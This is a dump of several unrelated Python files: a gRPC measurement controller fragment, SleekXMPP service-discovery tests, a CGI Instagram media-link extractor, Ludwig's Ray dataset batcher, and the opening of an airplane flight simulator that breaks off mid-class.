self.MEASUREMENT_HEADER = "run;iteration;start_time;end_time;elapsed"
self.lock = threading.RLock()
def measure_workload(self, compin: ManagedCompin, probe: str, cycles: int) -> List[str]:
stub: MiddlewareAgentStub = connect_to_grpc_server(MiddlewareAgentStub, compin.ip, AGENT_PORT,
block=True, production=True)
measure_msg = middleware_pb2.ProbeMeasurement(
probe=middleware_pb2.ProbeDescriptor(name=probe),
warmUpCycles=0,
measuredCycles=cycles
)
result = stub.MeasureProbe(measure_msg)
if result.result != middleware_pb2.ProbeCallResult.Result.Value("OK"):
# TODO: propagate this exception to the highest level
raise Exception("Error in measurements")
data: List[str] = []
for row in stub.CollectProbeResults(measure_msg.probe):
if row.WhichOneof("resultType") == "header":
assert row.header.strip() == self.MEASUREMENT_HEADER
elif row.WhichOneof("resultType") == "row":
data.append(row.row)
return data
def start(self):
measurement_thread = threading.Thread(target=self._run, args=())
measurement_thread.setDaemon(True)
measurement_thread.start()
def _run(self) -> None:
"""
Measurement thread.
"""
while True:
with self.lock:
scenario: RuntimeMeasurementScenario = self._factory.next_scenario()
if scenario is None:
time.sleep(1)
continue
self._pool = ThreadPool(processes=len(scenario.workloads))
for compin, probe, cycles in scenario.workloads:
result = self._pool.apply_async(self.measure_workload, (compin, probe, cycles))
self._compin_threads[compin.ip] = (compin, result)
for compin, result in self._compin_threads.values():
result.wait()
data = result.get()
self.statistics_collector.process_data(compin, data)
self._log_stats()
def add_compin(self, compin: ManagedCompin) -> None:
"""
        Notifies the controller about a new compin available for measurement. If this compin fits the criteria for the
current measurement scenario, starts measuring its probes right away.
:param compin: ManagedCompin to add
"""
with self.lock:
self._factory.add_compin(compin)
def remove_compin(self, compin: ManagedCompin) -> None:
"""
Notifies the controller that the given compin is going to be deleted. If this compin is currently being
measured, stops the measurement.
:param compin: ManagedCompin to remove
"""
with self.lock:
self._factory.remove_compin(compin)
def _log_stats(self) -> None:
logging.info(f"------------ TOTAL PERCENTAGE: {self.statistics_collector.get_global_stats()} ---------------")
for (app, component), percentage in self.statistics_collector.get_component_stats():
logging.info(f"Component {app}${component}: {percentage}")
logging.info("--------------------------------------------------------------------------------------------")
for compin, percentage in self.statistics_collector.get_compin_stats():
logging.info(f"Compin {compin}: {percentage}")
|
test_stream_xep_0030.py
|
import sys
import time
import threading
from sleekxmpp.test import *
class TestStreamDisco(SleekTest):
"""
Test using the XEP-0030 plugin.
"""
def tearDown(self):
self.stream_close()
def testInfoEmptyDefaultNode(self):
"""
Info query result from an entity MUST have at least one identity
and feature, namely http://jabber.org/protocol/disco#info.
Since the XEP-0030 plugin is loaded, a disco response should
be generated and not an error result.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
self.recv("""
<iq type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#info" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info">
<identity category="client" type="bot" />
<feature var="http://jabber.org/protocol/disco#info" />
</query>
</iq>
""")
def testInfoEmptyDefaultNodeComponent(self):
"""
Test requesting an empty, default node using a Component.
"""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
self.recv("""
<iq type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#info" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info">
<identity category="component" type="generic" />
<feature var="http://jabber.org/protocol/disco#info" />
</query>
</iq>
""")
def testInfoIncludeNode(self):
"""
Results for info queries directed to a particular node MUST
include the node in the query response.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
self.xmpp['xep_0030'].static.add_node(node='testing')
self.recv("""
<iq to="tester@localhost" type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
</query>
</iq>""",
method='mask')
def testItemsIncludeNode(self):
"""
Results for items queries directed to a particular node MUST
include the node in the query response.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
self.xmpp['xep_0030'].static.add_node(node='testing')
self.recv("""
<iq to="tester@localhost" type="get" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
</query>
</iq>""",
method='mask')
def testDynamicInfoJID(self):
"""
Test using a dynamic info handler for a particular JID.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('client', 'console', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
jid='tester@localhost',
handler=dynamic_jid)
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<identity category="client"
type="console"
name="Dynamic Info" />
</query>
</iq>
""")
def testDynamicInfoGlobal(self):
"""
Test using a dynamic info handler for all requests.
"""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('component', 'generic', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
handler=dynamic_global)
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<identity category="component"
type="generic"
name="Dynamic Info" />
</query>
</iq>
""")
def testOverrideJIDInfoHandler(self):
"""Test overriding a JID info handler."""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('client', 'console', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
jid='tester@localhost',
handler=dynamic_jid)
self.xmpp['xep_0030'].make_static(jid='tester@localhost',
node='testing')
self.xmpp['xep_0030'].add_identity(jid='tester@localhost',
node='testing',
category='automation',
itype='command-list')
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<identity category="automation"
type="command-list" />
</query>
</iq>
""")
def testOverrideGlobalInfoHandler(self):
"""Test overriding the global JID info handler."""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoInfo()
result['node'] = node
result.add_identity('component', 'generic', name='Dynamic Info')
return result
self.xmpp['xep_0030'].set_node_handler('get_info',
handler=dynamic_global)
self.xmpp['xep_0030'].make_static(jid='user@tester.localhost',
node='testing')
self.xmpp['xep_0030'].add_feature(jid='user@tester.localhost',
node='testing',
feature='urn:xmpp:ping')
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#info"
node="testing">
<feature var="urn:xmpp:ping" />
</query>
</iq>
""")
def testGetInfoRemote(self):
"""
Test sending a disco#info query to another entity
and receiving the result.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
events = set()
def handle_disco_info(iq):
events.add('disco_info')
self.xmpp.add_event_handler('disco_info', handle_disco_info)
t = threading.Thread(name="get_info",
target=self.xmpp['xep_0030'].get_info,
args=('user@localhost', 'foo'))
t.start()
self.send("""
<iq type="get" to="user@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#info"
node="foo" />
</iq>
""")
self.recv("""
<iq type="result" to="tester@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#info"
node="foo">
<identity category="client" type="bot" />
<feature var="urn:xmpp:ping" />
</query>
</iq>
""")
# Wait for disco#info request to be received.
t.join()
time.sleep(0.1)
self.assertEqual(events, set(('disco_info',)),
"Disco info event was not triggered: %s" % events)
def testDynamicItemsJID(self):
"""
Test using a dynamic items handler for a particular JID.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester@localhost', node='foo', name='JID')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
jid='tester@localhost',
handler=dynamic_jid)
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="tester@localhost" node="foo" name="JID" />
</query>
</iq>
""")
def testDynamicItemsGlobal(self):
"""
Test using a dynamic items handler for all requests.
"""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester@localhost', node='foo', name='Global')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
handler=dynamic_global)
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="tester@localhost" node="foo" name="Global" />
</query>
</iq>
""")
def testOverrideJIDItemsHandler(self):
"""Test overriding a JID items handler."""
self.stream_start(mode='client',
plugins=['xep_0030'])
def dynamic_jid(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester@localhost', node='foo', name='Global')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
jid='tester@localhost',
handler=dynamic_jid)
self.xmpp['xep_0030'].make_static(jid='tester@localhost',
node='testing')
self.xmpp['xep_0030'].add_item(ijid='tester@localhost',
node='testing',
jid='tester@localhost',
subnode='foo',
name='Test')
self.recv("""
<iq type="get" id="test" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="tester@localhost" node="foo" name="Test" />
</query>
</iq>
""")
def testOverrideGlobalItemsHandler(self):
"""Test overriding the global JID items handler."""
self.stream_start(mode='component',
jid='tester.localhost',
plugins=['xep_0030'])
def dynamic_global(jid, node, iq):
result = self.xmpp['xep_0030'].stanza.DiscoItems()
result['node'] = node
result.add_item('tester.localhost', node='foo', name='Global')
return result
self.xmpp['xep_0030'].set_node_handler('get_items',
handler=dynamic_global)
self.xmpp['xep_0030'].make_static(jid='user@tester.localhost',
node='testing')
self.xmpp['xep_0030'].add_item(ijid='user@tester.localhost',
node='testing',
jid='user@tester.localhost',
subnode='foo',
name='Test')
self.recv("""
<iq type="get" id="test"
to="user@tester.localhost"
from="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing" />
</iq>
""")
self.send("""
<iq type="result" id="test"
to="tester@localhost"
from="user@tester.localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="testing">
<item jid="user@tester.localhost" node="foo" name="Test" />
</query>
</iq>
""")
def testGetItemsRemote(self):
"""
Test sending a disco#items query to another entity
and receiving the result.
"""
self.stream_start(mode='client',
plugins=['xep_0030'])
events = set()
results = set()
def handle_disco_items(iq):
events.add('disco_items')
results.update(iq['disco_items']['items'])
self.xmpp.add_event_handler('disco_items', handle_disco_items)
t = threading.Thread(name="get_items",
target=self.xmpp['xep_0030'].get_items,
args=('user@localhost', 'foo'))
t.start()
self.send("""
<iq type="get" to="user@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#items"
node="foo" />
</iq>
""")
self.recv("""
<iq type="result" to="tester@localhost" id="1">
<query xmlns="http://jabber.org/protocol/disco#items"
node="foo">
<item jid="user@localhost" node="bar" name="Test" />
<item jid="user@localhost" node="baz" name="Test 2" />
</query>
</iq>
""")
# Wait for disco#items request to be received.
t.join()
time.sleep(0.1)
items = set([('user@localhost', 'bar', 'Test'),
('user@localhost', 'baz', 'Test 2')])
self.assertEqual(events, set(('disco_items',)),
"Disco items event was not triggered: %s" % events)
self.assertEqual(results, items,
"Unexpected items: %s" % results)
def testGetItemsIterator(self):
"""Test interaction between XEP-0030 and XEP-0059 plugins."""
raised_exceptions = []
self.stream_start(mode='client',
plugins=['xep_0030', 'xep_0059'])
results = self.xmpp['xep_0030'].get_items(jid='foo@localhost',
node='bar',
iterator=True)
results.amount = 10
def run_test():
try:
results.next()
except StopIteration:
raised_exceptions.append(True)
t = threading.Thread(name="get_items_iterator",
target=run_test)
t.start()
self.send("""
<iq id="2" type="get" to="foo@localhost">
<query xmlns="http://jabber.org/protocol/disco#items"
node="bar">
<set xmlns="http://jabber.org/protocol/rsm">
<max>10</max>
</set>
</query>
</iq>
""")
self.recv("""
<iq id="2" type="result" to="tester@localhost">
<query xmlns="http://jabber.org/protocol/disco#items">
<set xmlns="http://jabber.org/protocol/rsm">
</set>
</query>
</iq>
""")
t.join()
self.assertEqual(raised_exceptions, [True],
"StopIteration was not raised: %s" % raised_exceptions)
suite = unittest.TestLoader().loadTestsFromTestCase(TestStreamDisco)
|
insta.py
|
#!D:/Python3/python.exe
import cgi
import re
import urllib,urllib.request
import time
import os
import _thread
import threading
import datetime
#os.environ['NO_PROXY'] = 'instagram.com'
form = cgi.FieldStorage() # parse the submitted form data
l = threading.Lock() # create a lock
'''def loadF(newurl, photoname):
try:
urllib.request.urlretrieve(newurl, 'C://Server/www/'+photoname+'.jpg')
except Exception as err:
print("Wrong link")
'''
def Uol():
try:
with l:
link = str(urllib.request.urlopen(cgi.escape(form['link'].value)).read())
ex = re.compile(r'(("display_url"|"video_url"):"https://(.*?).(jpg|mp4)")')
result = ex.finditer(link)
photos = []
for ma in result:
if str(ma.group(0)) not in photos:
photos.append(str(ma.group(0)))
if len(photos) == 0:
print("<div align=\"center\">")
print("<h1>Wrong link</h1>")
print("</div>")
delsize = 0
typecontent = ""
for newurl in list(photos):
if "video" in newurl:
delsize = 13
typecontent = "<div id=\"cont\" align=\"center\"><video controls=\"controls\"><source src=\"$URL$\"></video></div>"
else:
delsize = 15
typecontent = "<div id=\"cont\" align=\"center\"><img src=\"$URL$\" alt=\"alternative text\"> </div>"
newurl = newurl[delsize:len(newurl)-1]
print(typecontent.replace("$URL$",newurl))
except Exception as er:
print(er)
now= str(datetime.datetime.now().strftime("%d-%m-%Y %H:%M"))
print("<footer>")
print("<p>Right-click on the photo or video and choose \"Save image (video) as...\"</p>")
print("</footer>")
print("<div id=\"dt\" align=\"center\">"+now+"</div>")
print("</div>")
print("</body>")
print("</html>")
def htmlS():
print('Content-type: text/html\n')
with open("InstagramLo.html") as file:
for i in range(0,25):
print(file.readline(), end="\n")
htmlS()
if 'link' not in form:
print("<div align=\"center\">")
print("<h1>Empty</h1>")
print("</div>")
else:
thread = threading.Thread(target=Uol, args=())
thread.start()
thread.join()
|
ray.py
|
#! /usr/bin/env python
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import contextlib
import math
import queue
import threading
from distutils.version import LooseVersion
from functools import lru_cache
from typing import Any, Dict, Iterator
import numpy as np
import pandas as pd
import ray
from ray.data import from_dask, read_parquet
from ray.data.dataset_pipeline import DatasetPipeline
from ray.data.extensions import TensorDtype
from ludwig.constants import BINARY, CATEGORY, NAME, NUMERICAL, TYPE
from ludwig.data.batcher.base import Batcher
from ludwig.data.dataset.base import Dataset, DatasetManager
from ludwig.utils.data_utils import DATA_TRAIN_HDF5_FP
from ludwig.utils.misc_utils import get_proc_features
from ludwig.utils.types import DataFrame
_ray18 = LooseVersion(ray.__version__) >= LooseVersion("1.8")
_SCALAR_TYPES = {BINARY, CATEGORY, NUMERICAL}
class RayDataset(Dataset):
"""Wrapper around ray.data.Dataset."""
def __init__(self, df: DataFrame, features: Dict[str, Dict], training_set_metadata: Dict[str, Any]):
self.ds = from_dask(df) if not isinstance(df, str) else read_parquet(df)
self.features = features
self.training_set_metadata = training_set_metadata
self.data_hdf5_fp = training_set_metadata.get(DATA_TRAIN_HDF5_FP)
# TODO ray 1.8: convert to Tensors before shuffle
# def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
# for c in features.keys():
# df[c] = df[c].astype(TensorDtype())
# return df
# self.ds = self.ds.map_batches(to_tensors, batch_format="pandas")
def pipeline(self, shuffle=True) -> DatasetPipeline:
pipe = self.ds.repeat()
if shuffle:
if _ray18:
pipe = pipe.random_shuffle_each_window()
else:
pipe = pipe.random_shuffle()
return pipe
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.ds.repeat().iter_datasets(),
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
def __len__(self):
return self.ds.count()
@property
def size(self):
return len(self)
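# Hedged usage sketch (comments only, not executed): a RayDataset is typically
# consumed one epoch at a time through its batcher. The names `df`, `features`,
# and `training_set_metadata` below are hypothetical inputs from preprocessing:
#
#   ds = RayDataset(df, features, training_set_metadata)
#   with ds.initialize_batcher(batch_size=128) as batcher:
#       while not batcher.last_batch():
#           batch = batcher.next_batch()  # dict: column name -> np.ndarray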
class RayDatasetManager(DatasetManager):
def __init__(self, backend):
self.backend = backend
def create(self, dataset: DataFrame, config: Dict[str, Any], training_set_metadata: Dict[str, Any]):
return RayDataset(dataset, get_proc_features(config), training_set_metadata)
def save(
self,
cache_path: str,
dataset: DataFrame,
config: Dict[str, Any],
training_set_metadata: Dict[str, Any],
tag: str,
):
self.backend.df_engine.to_parquet(dataset, cache_path)
return cache_path
def can_cache(self, skip_save_processed_input):
return not skip_save_processed_input
@property
def data_format(self):
return "parquet"
class RayDatasetShard(Dataset):
def __init__(
self,
dataset_shard: DatasetPipeline,
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
):
self.dataset_shard = dataset_shard
self.features = features
self.training_set_metadata = training_set_metadata
self.dataset_iter = dataset_shard.iter_datasets()
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.dataset_iter,
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
@lru_cache(1)
def __len__(self):
# TODO(travis): find way to avoid calling this, as it's expensive
return next(self.dataset_iter).count()
@property
def size(self):
return len(self)
class RayDatasetBatcher(Batcher):
def __init__(
self,
dataset_epoch_iterator: Iterator[ray.data.Dataset],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
batch_size: int,
samples_per_epoch: int,
):
self.dataset_epoch_iterator = dataset_epoch_iterator
self.batch_size = batch_size
self.samples_per_epoch = samples_per_epoch
self.training_set_metadata = training_set_metadata
self.features = features
self.columns = list(features.keys())
self.reshape_map = {
proc_column: training_set_metadata[feature[NAME]].get("reshape")
for proc_column, feature in features.items()
}
self.dataset_batch_iter = None
self._epoch = 0
self._next_batch = None
self._last_batch = False
self._step = 0
self._fetch_next_epoch()
def next_batch(self):
if self.last_batch():
raise StopIteration()
batch = self._next_batch
self._fetch_next_batch()
self._step += 1
return batch
def last_batch(self):
return self._last_batch
def set_epoch(self, epoch, batch_size):
self.batch_size = batch_size
if epoch != self._epoch:
self._fetch_next_epoch()
self._epoch = epoch
@property
def step(self):
return self._step
@property
def steps_per_epoch(self):
return math.ceil(self.samples_per_epoch / self.batch_size)
def _fetch_next_epoch(self):
dataset = next(self.dataset_epoch_iterator)
read_parallelism = 1
if read_parallelism == 1:
self.dataset_batch_iter = self._create_async_reader(dataset)
elif read_parallelism > 1:
self.dataset_batch_iter = self._create_async_parallel_reader(dataset, read_parallelism)
else:
# TODO: consider removing this. doesn't work currently and read performance seems generally
# very good with 1 parallelism
self.dataset_batch_iter = self._create_sync_reader(dataset)
self._step = 0
self._fetch_next_batch()
def _fetch_next_batch(self):
if self.dataset_batch_iter is None:
self._last_batch = True
return
self._last_batch = False
try:
self._next_batch = next(self.dataset_batch_iter)
except StopIteration:
self._last_batch = True
def _to_tensors_fn(self):
columns = self.columns
features = self.features
def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
for c in columns:
# do not convert scalar columns: https://github.com/ray-project/ray/issues/20825
if features[c][TYPE] not in _SCALAR_TYPES:
df[c] = df[c].astype(TensorDtype())
return df
return to_tensors
def _prepare_batch(self, batch: pd.DataFrame) -> Dict[str, np.ndarray]:
res = {c: batch[c].to_numpy() for c in self.columns}
for c in self.columns:
reshape = self.reshape_map.get(c)
if reshape is not None:
res[c] = res[c].reshape((-1, *reshape))
return res
def _create_sync_reader(self, dataset: ray.data.Dataset):
to_tensors = self._to_tensors_fn()
def sync_read():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=self.batch_size, batch_format="pandas"
):
yield self._prepare_batch(batch)
return sync_read()
def _create_async_reader(self, dataset: ray.data.Dataset):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
def producer():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=batch_size, batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_read():
t = threading.Thread(target=producer)
t.start()
while True:
batch = q.get(block=True)
if batch is None:
break
yield batch
t.join()
return async_read()
def _create_async_parallel_reader(self, dataset: ray.data.Dataset, num_threads: int):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
splits = dataset.split(n=num_threads)
def producer(i):
for batch in (
splits[i]
.map_batches(to_tensors, batch_format="pandas")
.iter_batches(prefetch_blocks=0, batch_size=batch_size, batch_format="pandas")
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_parallel_read():
threads = [threading.Thread(target=producer, args=(i,)) for i in range(num_threads)]
for t in threads:
t.start()
active_threads = num_threads
while True:
batch = q.get(block=True)
if batch is None:
active_threads -= 1
if active_threads == 0:
break
yield batch
for t in threads:
t.join()
return async_parallel_read()
|
airplane.py
|
#!/usr/bin/env python2
"""
Basic fixed-wing airplane simulator to test out an intuitive model.
This was a thrown-together messy modification of the software in
my multicopter repo.
"""
from __future__ import division
from threading import Thread
from collections import deque
import time
import numpy as np; npl = np.linalg # pip install numpy
from inputs import devices, get_gamepad # pip install inputs
from mayavi import mlab # http://docs.enthought.com/mayavi/mayavi/installation.html
from tvtk.tools import visual # ^^^
###################################################################### ADMIN SETUP
# Redirect pointlessly spammed mayavi warnings
import os, vtk
if os.path.exists("/dev/null"): shadow_realm = "/dev/null"
else: shadow_realm = "c:\\nul"
mlab_warning_output = vtk.vtkFileOutputWindow()
mlab_warning_output.SetFileName(shadow_realm)
vtk.vtkOutputWindow().SetInstance(mlab_warning_output)
###################################################################### MATH HELPERS
def quaternion_inverse(q):
"""
Returns the inverse of the given quaternion q = [x, y, z, w].
"""
invq = np.copy(q)
invq[:3] = -invq[:3]
return invq
def quaternion_multiply(ql, qr):
"""
Returns the quaternion multiplication ql * qr all in the form [x, y, z, w].
"""
return np.array((ql[0]*qr[3] + ql[1]*qr[2] - ql[2]*qr[1] + ql[3]*qr[0],
-ql[0]*qr[2] + ql[1]*qr[3] + ql[2]*qr[0] + ql[3]*qr[1],
ql[0]*qr[1] - ql[1]*qr[0] + ql[2]*qr[3] + ql[3]*qr[2],
-ql[0]*qr[0] - ql[1]*qr[1] - ql[2]*qr[2] + ql[3]*qr[3]))
def rotate_vector(q, v, reverse=False):
"""
Applies the given quaternion to a vector v.
If reverse is set to True, the inverse quaternion is applied instead.
"""
uv = 2*np.cross(q[:-1], v)
if reverse: return v - q[-1]*uv + np.cross(q[:-1], uv)
else: return v + q[-1]*uv + np.cross(q[:-1], uv)
def rotvec_from_quaternion(q):
"""
Returns the rotation vector corresponding to the quaternion q = [x, y, z, w].
A rotation vector is the product of the angle of rotation (0 to pi) and
axis of rotation (unit vector) of an SO3 quantity like a quaternion.
"""
q = np.array(q, dtype=np.float64)
sina2 = npl.norm(q[:-1])
if np.isclose(sina2, 0): return np.zeros(3, dtype=np.float64)
if q[-1] < 0: q = -q
return 2*np.arccos(q[-1]) * q[:-1]/sina2
def quaternion_from_rotvec(r):
"""
Returns the quaternion [x, y, z, w] equivalent to the given rotation vector r.
"""
angle = np.mod(npl.norm(r), 2*np.pi)
if np.isclose(angle, 0): return np.array([0, 0, 0, 1], dtype=np.float64)
return np.concatenate((np.sin(angle/2)*np.divide(r, angle), [np.cos(angle/2)]))
def rotmat_from_quaternion(q):
"""
Returns the rotation matrix associated with the quaternion q = [x, y, z, w].
"""
Q = 2*np.outer(q, q)
return np.array([[1-Q[1, 1]-Q[2, 2], Q[0, 1]-Q[2, 3], Q[0, 2]+Q[1, 3]],
[ Q[0, 1]+Q[2, 3], 1-Q[0, 0]-Q[2, 2], Q[1, 2]-Q[0, 3]],
[ Q[0, 2]-Q[1, 3], Q[1, 2]+Q[0, 3], 1-Q[0, 0]-Q[1, 1]]], dtype=np.float64)
def euler_from_quaternion(q):
"""
Returns the (roll, pitch, yaw) in radians associated with the quaternion q = [x, y, z, w].
"""
return np.array((np.arctan2(2*(q[3]*q[0] + q[1]*q[2]), 1 - 2*(q[0]**2 + q[1]**2)),
np.arcsin(2*(q[3]*q[1] - q[2]*q[0])),
np.arctan2(2*(q[3]*q[2] + q[0]*q[1]), 1 - 2*(q[1]**2 + q[2]**2))))
def quaternion_from_euler(roll, pitch, yaw):
"""
Returns the quaternion q = [x, y, z, w] associated with the Euler angles roll, pitch, and yaw in radians.
"""
cr = np.cos(0.5*roll)
sr = np.sin(0.5*roll)
cp = np.cos(0.5*pitch)
sp = np.sin(0.5*pitch)
cy = np.cos(0.5*yaw)
sy = np.sin(0.5*yaw)
return np.array([cy*sr*cp - sy*cr*sp,
cy*cr*sp + sy*sr*cp,
sy*cr*cp - cy*sr*sp,
cy*cr*cp + sy*sr*sp], dtype=np.float64)
def unwrap_angle(ang):
"""
Returns an equivalent angle to ang in radians on [-np.pi, np.pi].
"""
return np.mod(ang + np.pi, 2*np.pi) - np.pi
def ori_error(qdes, q):
"""
Does a Lie algebraic orientation error computation given quaternions qdes and q as [x, y, z, w].
The returned 3-vector is a rotvec in body-coordinates pointing along the geodesic from q to qdes.
"""
return rotvec_from_quaternion(quaternion_multiply(quaternion_inverse(q), qdes))
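# Quick sanity-check sketch for the helpers above (comments only, not part of
# the simulation): Euler angles should round-trip through a quaternion, and the
# orientation error of a quaternion against itself should be zero.
#
#   q = quaternion_from_euler(0.1, -0.2, 0.3)
#   assert np.allclose(euler_from_quaternion(q), (0.1, -0.2, 0.3))
#   assert np.allclose(ori_error(q, q), np.zeros(3))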
###################################################################### WORLD SETUP
# Local gravity (world frame)
grav = np.array([0.0, 0.0, -9.81]) # m/s^2
# Local density of air
dens = 1.225 # kg/m^3
# Function for wind velocity at time t
def wind(t):
return np.array([0, 0, 0]) # m/s
###################################################################### MODEL SETUP
class Surface(object):
def __init__(self, pc, q0, Cp1, Cp2, Cq, upoint, uaxis, umin, umax, udot):
self.pc = pc # center of pressure in surface coords
self.q0 = q0 # initial orientation of surface relative to body
self.Cp1 = Cp1
self.Cp2 = Cp2
self.Cq = Cq
self.upoint = upoint # mounting point in body coords (always surface origin)
self.uaxis = uaxis / npl.norm(uaxis) # axis of joint rotation in body coords
self.umin = umin # minimum joint angle
self.umax = umax # maximum joint angle
self.udot = abs(udot) # maximum deflection rate
self.ucmd = 0 # current joint command
self.u = 0 # current joint angle
self.q = np.copy(self.q0)
self.pc_body = self.upoint + rotate_vector(self.q, self.pc)
def update(self, dt):
err = self.ucmd - self.u
du = dt*self.udot
if abs(err) < du: self.u = self.ucmd
elif err > 0: self.u += du
else: self.u -= du
self.u = np.clip(self.u, self.umin, self.umax)
self.q = quaternion_multiply(self.q0, quaternion_from_rotvec(self.u*self.uaxis))
self.pc_body = self.upoint + rotate_vector(self.q, self.pc)
class FixWing(object):
def __init__(self):
# Total mass
self.m = np.float64(10) # kg
self.invm = 1/self.m
# Inertia matrix
self.M = np.zeros((3, 3), dtype=np.float64) # kg*m^2
self.M[0, 0] = 2*self.m
self.M[1, 1] = 2*self.m
self.M[2, 2] = 4*self.m
self.M[2, 0] = self.M[0, 2] = 1*self.m
self.M[1, 0] = self.M[0, 1] = 0
self.M[2, 1] = self.M[1, 2] = 0
self.invM = npl.inv(self.M)
# Linear and quadratic translational drag coefficients
self.Cp1 = 0.01*np.array([1, 10, 150], dtype=np.float64) # N/(m/s)
self.Cp2 = 0.01*np.array([1, 10, 150], dtype=np.float64) # N/(m/s)^2
# Main body center of drag and rotational drag coefficients
self.rc = np.array([0, 0, 0], dtype=np.float64) # m
self.Cq = np.array([30, 40, 20], dtype=np.float64) # N/(rad/s)
# Thrust from throttle ratio
